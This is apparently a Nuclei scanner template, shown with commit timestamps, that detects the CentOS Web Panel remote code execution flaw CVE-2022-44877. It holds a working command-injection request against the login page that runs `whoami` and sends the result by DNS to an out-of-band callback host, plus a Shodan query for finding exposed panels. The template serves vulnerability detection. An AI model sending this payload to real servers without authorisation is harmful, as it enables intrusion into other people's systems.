2023-01-07 07:01:12 +00:00
id : CVE-2022-44877
info :
2023-03-27 17:46:47 +00:00
name : CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
2023-01-07 07:01:12 +00:00
author : For3stCo1d
severity : critical
description : |
2023-03-27 17:46:47 +00:00
CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-01-07 07:01:12 +00:00
reference :
2023-01-09 15:38:53 +00:00
- https://twitter.com/_0xf4n9x_/status/1612068225046675457
2023-01-07 07:01:12 +00:00
- https://github.com/numanturle/CVE-2022-44877
2023-01-10 02:01:48 +00:00
- https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386
2023-03-27 17:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-44877
2023-01-07 07:01:12 +00:00
classification :
2023-01-12 09:43:49 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-01-07 07:01:12 +00:00
cve-id : CVE-2022-44877
2023-01-12 09:43:49 +00:00
cwe-id : CWE-78
2023-01-07 07:01:12 +00:00
metadata :
shodan-query : http.title:"Login | Control WebPanel"
2023-01-10 02:01:48 +00:00
verified : "true"
2023-01-17 21:46:36 +00:00
tags : cve,cve2022,centos,rce,kev
2023-01-07 07:01:12 +00:00
requests :
- raw :
- |
2023-01-09 15:38:53 +00:00
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
2023-01-07 07:01:12 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=root&password=toor&commit=Login
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
2023-01-09 15:38:53 +00:00
- "dns"
- type : word
part : body
words :
- "Login Redirect."
2023-01-07 07:01:12 +00:00
- type : status
status :
- 302
2023-01-09 15:38:53 +00:00
extractors :
- type : regex
part : interactsh_request
group : 1
regex :
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
2023-03-27 17:46:47 +00:00
# Enhanced by md on 2023/03/22